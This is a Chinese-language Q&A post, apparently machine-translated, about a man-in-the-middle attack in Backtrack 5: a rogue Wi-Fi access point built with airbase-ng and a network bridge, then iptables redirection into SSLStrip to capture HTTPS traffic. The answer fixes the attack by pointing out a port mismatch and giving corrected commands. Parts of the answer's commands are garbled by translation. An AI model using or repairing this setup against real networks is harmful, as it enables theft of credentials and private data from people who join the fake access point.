SSLStrip不适用于我

Question

我在使用Backtrack 5的MITM设置中遇到SSLStrip问题。我正在使用外部无线卡来广播无线信号，并通过以太网进行路由。我正在Wireshark中成功查看数据包，但是我想使用SSLStrip查看SSL数据。这些是我用来设置MITM的初步命令。

airmon-ng start wlan1 
airbase-ng --essid mitm 11 mon0 

--new Terminal--

brctl addbr mitm-bridge 
brctl addif mitm-bridge eth0 
brctl addif mitm-bridge at0 
ifconfig eth0 0.0.0.0 up 
ifconfig at0 0.0.0.0 up 
ifconfig mitm-bridge 192.168.0.199 up 
echo 1 > /proc/sys/net/ipv4/ip_forward 

此时，我可以是Wireshark查看分组数据。我按照以下步骤设置SSLStrip

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666 
cd /pentest/web/sslstrip 
sslstrip -l 8080 

当我完成会话后，我打开sslstrip.log我没有看到写入到文件中的任何数据。另外，一旦执行iptables重定向，我无法访问互联网。请让我知道你认为问题可能是什么。

Answer 1

假设sslstrip和arp中毒已启动并且正在运行，您有一个端口重定向问题。

的iptables -t NAT -A PREROUTING -p tcp的--destination-80端口重定向-j --to端口666

http流量重定向到127.0.0.1端口666

CD/pentest /网络/ sslstrip
sslstrip -l 8080

开始sslstrip监听传入traff IC端口8080

U可以要么改变端口重定向到8080

iptables的-t NAT -A PREROUTING -p TCP --destination端口80 -j REDIRECT --to端口8080

或更改侦听端口666

sslstrip -l 666